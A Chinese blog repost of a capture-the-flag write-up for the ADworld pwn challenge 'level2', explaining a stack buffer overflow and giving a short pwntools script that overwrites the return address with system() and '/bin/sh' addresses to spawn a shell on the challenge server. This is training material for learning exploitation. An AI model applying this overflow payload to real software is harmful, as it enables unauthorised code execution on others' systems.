ADworld_level_2

已于 2022-02-25 21:50:14 修改
阅读量593 收藏
点赞数 2
分类专栏: pwn做题记录 文章标签: pwn
于 2022-02-11 22:08:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62423835/article/details/122887739
版权

以下是adworld里endust师傅的wp
————————————————————————————————
checksec扫描
在这里插入图片描述

使用ida打开可以发现,初始的buf的空间只有0x88,但是读取我们输入的内容的时候,选择的大小却是0x100,造成了溢出
在这里插入图片描述
通过这些,我们直接构建exp

from pwn import *
a = remote('111.198.29.45',36253)
##system函数的地址
sysaddr = 0x08048320
##程序中/bin/sh字符串所在的地址
binshaddr = 0x0804A024
##0x88是程序中缓冲区的大小,4个大小是需要覆盖的ebp的地址,之后是
##函数的返回地址,被system的地址覆盖了,进入到system函数之后,
##需要构造system函数的栈帧,因为ebp+8是形参的地址,所以需要四个
##字节的填充p32(0),后面放的是system里面的参数的地址。这样子溢出
##之后就会获得shell
payload = 'a'*0x88+'b'*4+p32(sysaddr)+p32(0)+p32(binshaddr)
a.send(payload)
a.interactive()

——————
搬运工注1:如果去adworld上买了这个wp的师傅直接用exp出了问题,是因为原作者的payload再b4后面多加了一个8,去掉就没问题了
注2:经过试验,p32似乎也需要转码,否则也会出现error

这个脚本可以获取控制权,ls一下可以看到flag就在目录里面
————————————————————————————————
*菜鸡的笔记
补两张图:
1,_system函数(注意,不是system函数,感谢另外一位师傅iyzyi的wp,注明了这一点)
在这里插入图片描述
——

这里system里面是command,也就是说只要有参数,就可以执行

在这里插入图片描述

2,/bin/sh
在这里插入图片描述
找到了/bin/sh(怎么找到的我也不知道,研究出来的方法会放在后面),在payload里面连续相加,就相当于system(“/bin/sh”)

——————
寻找bin:ida搜索功能的快捷键是alt+T

费列罗大帝
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ADworld-RE100
WocW的博客
05-09 258
分析 进入IDA查看后能看到input key的位置,以为又是一道很清晰的逆向题,跟进后发现后面只有一个check CheckStringIsNumber。也就是说只要是数字就可以通过这个验证,以及有几个反调试函数detectDebugging 和 checkDebuggerProcessRunning。以为在动态调试的时候修改返回值即可,但是几次之后发现了不对劲。仔细看之后发现了fork函数 ...
adworld-EasyRE
bunner_的博客
10-14 164
1、拿到exe文件,扔到exeinfo里面看一下,发现是32位无壳 2、扔到IDA里面,通过[shift+F12]找字符串 发现"right",双击跟过去 发现sub_401080调用了这个字符串,跟过去,F5反编译 对于23行到30行的代码我们猜测是将输入串赋值到byte_40336C里面来,但是不是很确定,我们可以去OD里面确认一下 把文件扔进OD,根据sub_401080函数在IDA中相对位置(汇编代码textview可看见)可以在OD中找到其位置,然后该循环之后打断点 从图中发现byte_
adworldCTF-WP1
a_new_boy
05-03 173
adworldCTF-WP ext3 把Linux光盘挂载在Ubuntu上 然后用strings linux | grep flag命令来搜寻含有flag字眼的文件(原光盘名不方便用命令行 所以我重命名为linux了) 然后在root模式下用mount linux /mnt命令将Linux光盘挂载到mnt目录下 cd /mnt切换到mnt目录 使用cat O7avZhikgKgbF/flag.txt命令即可对flag内容进行读取 发现是一个base64编码 用在线网站解码即可得到flag [外链图
adworld-crypto-Easy_Crypto
bunner_的博客
10-24 250
拿到文件是一段加密代码,吐槽一句,格式过于粗糙 ,所以我用python重写一下就是这样: s = [] t = [] key = 'hello world' falg = '???????' for i in range(256): s.append(i) t.append(ord(key[i % len(key)])) j = 0 for i in range(256): j = (j + s[i] + t[i]) % 256 s[i], s[j] = s[j], s
攻防世界-adworld-Morse
32bin的博客
10-28 329
小鱼得意的瞟了你一眼,神神气气的拿走了答对谜语的奖励,你心里暗暗较劲 想着下一个谜题一定要比小鱼更快的解出来。上面没什么提示信息,只是刻着一些0和1,感觉有着一些奇怪的规律,你觉得有些熟悉,但是就是想不起来 这些01代表着什么意思。一旁的小鱼看你眉头紧锁的样子,扑哧一笑,对你讲“不好意思我又猜到答案了。”(flag格式为cyberpeace{xxxxxxxxxx},均为小写)131最佳Writeup由 吴心恋战 提供WriteUP。题目来源: poxlove3。解出人数:20661。
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
Adworld2012互联网营销世界大会PPT下载
07-23
教程名称: Adworld2012互联网营销世界大会PPT下载【】APPS新媒体运营及营销探索-岳建雄-搜狐【】体育营销动起来-陈鄂-力美【】品牌广告推动移动营销创新-郭伟-安沃传媒【】基于受众的网络广告交易市场-王岳龙-传漾...
adworld-wargame:我对https://adworld.xctf.org.cntask上的pwn挑战的利用
02-13
2. **类型混淆**:Python的动态类型系统允许不同类型的对象进行隐式转换,这可能导致意外的类型混淆错误。例如,将整数与字符串混合可能导致内存异常或数据篡改。 3. **文件操作漏洞**:如果程序处理用户提供的文件...
Adworld2009互动营销年度盛典English介绍
09-18
Adworld2009互动营销年度盛典English介绍
【XCTF-RE】新手练习区-csaw2013reversing2.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ova41g
intel网卡MAC修改工具(v5.29.05.02)
09-10
搜了网站的版本都比较老,于是上传一个比较新的版本给有需要的人 ---------------------------- 使用方法: 1. 将附件解压缩并复制到U盘DOS启动盘, 2. 开机引导进入DOS启动盘后,输入EEUPDATE命令并敲回车,确认Intel网卡这张网卡的NIC号是0还是1 3. 输入Eeupdate -nic=X -mac=********(X=Intel网卡的NIC号,*****=你们MAC的12位地址
攻防世界-adworld-crypto-Caesar
32bin的博客
10-28 165
你成功的解出了来了灯谜,小鱼一脸的意想不到“没想到你懂得这么多啊!” 你心里面有点小得意,“那可不是,论学习我没你成绩好轮别的我知道的可不比你少,走我们去看看下一个” 你们继续走,看到前面也是热热闹闹的,同样的大红灯笼高高挂起,旁边呢好多人叽叽喳喳说个不停。你一看 大灯笼,上面还是一对字符,你正冥思苦想呢,小鱼神秘一笑,对你说道,我知道这个的答案是什么了。73最佳Writeup由 Umo. 提供WriteUP。题目来源: poxlove3。解出人数:23201。
adworld-pwn-level2
bunner_的博客
10-17 178
必要知识点: 32位系统函数调用使用堆栈传参 其调用时栈的结构如下: 返回地址 -> 参数n -> 参数n-1 -> … -> 参数1 将elf文件扔到IDA中 跟进到vulnerable函数,里面有输入函数,可以用来做栈溢出 再看到有system函数 又在shift+f12字符串窗口里面看到/bin/sh 所以就是构造ROP链,通过栈溢出调用system函数,并将/bin/sh压入栈中作为参数 找到system的地址: 0x08048320 找到/bin/sh地址:0x080
ADworldPwn--CGfsb
VZZmieshenquan的博客
02-15 1080
Description: 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 Solution: 先checksec再file运行一下 Flag:
adworld-pwn-guess_num
bunner_的博客
10-21 205
本题考查知识点 srand()函数和rand()函数的随机数生成规则 gets()函数漏洞 – 实现栈溢出 check_sec 扔到IDA分析代码逻辑 srand()函数和rand()函数 前者设置随机种子,后者产生随机数 设置随机种子之后,随机数是循环产生的 从上图中可以看到v8和seed之间的位置关系,而v8是通过gets()函数输入的,我们可以通过栈溢出,从而达到设置seed的目的 v8 占用0x20个字节 seed 占用8个字节 所以我们构造下面的payload即可设置se.
adworld攻防世界-pwn-新手区-wp
令则
03-05 966
adworld-pwn-新手区 tcl 到现在才算是正经昨晚攻防世界的pwn新手区, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
32位汇编ebpebp-4、ebp+4、ebp+8等含义
最新发布
qq_52572621的博客
11-07 4580
ebp-4: 从ebp-4开始到函数提升堆栈后的栈顶之间被称为缓冲区(一般缓冲区栈顶是:函数调用时提升堆栈后esp的值),我们常说的局部变量都是定义在这里,所以大致可以理解为函数中。我们知道,当调用了一个函数后,底层汇编大多数会使用ebp寻址的方式去查找参数,关于ebp与esp寻址可以看我这篇文章《ebp寻址》。的含义,先总结这么多,因为长时间不使用汇编可能会忘了这些东西,忘了的话翻到这篇文章看看就行了。ebp+4:存放call指令调用函数时压入堆栈的。ebp+C: 存放函数传参的第二个参数地址。
adworld攻防世界 reverse asong
令则
03-15 874
asong 攻防世界 reverse  进阶区 asong 题目文件: https://www.jianguoyun.com/p/DQ3g5b4QiNbmBxjX_fQC (访问密码:AgV9Sh) 主要是集中我们常见的处理方式的整合, 注意一个对于out文件要open 然后read读入,另外python3要使用rb 模式,因为会出现不可打印字符,直接复制会出错,而r模式会报错。 文章目...
pwn基础知识笔记
月阴荒的博客
02-20 2342
算是总的开一篇文章,把学到的知识总结一下,之后会重复写到各个文章里面 checksec指令, 用来查询pwn题目的壳和保护,并且能够看到程序的信息 1.Canary保护 参考链接:https://blog.csdn.net/weixin_44540286/article/details/101629735?utm_source=distribute.pc_relevant.none-task Ca...
攻防世界-Web(新手区)
热门推荐
qwzf
07-17 2万+
前言 暑假前,为了学习Web题,做了攻防世界的新手区的Web题,当时没有总结,现在总结一下。 正文 Web1:view_source 查看源代码,右键不可以用。所以按F12,直接查看源码即可。 Web2:get_post HTTP的两种请求方式 GET GET请求的数据会附在URL之后(就是把数据放置在HTTP协议头中)如: /test/1.php?name1=value1&name...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

费列罗大帝

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值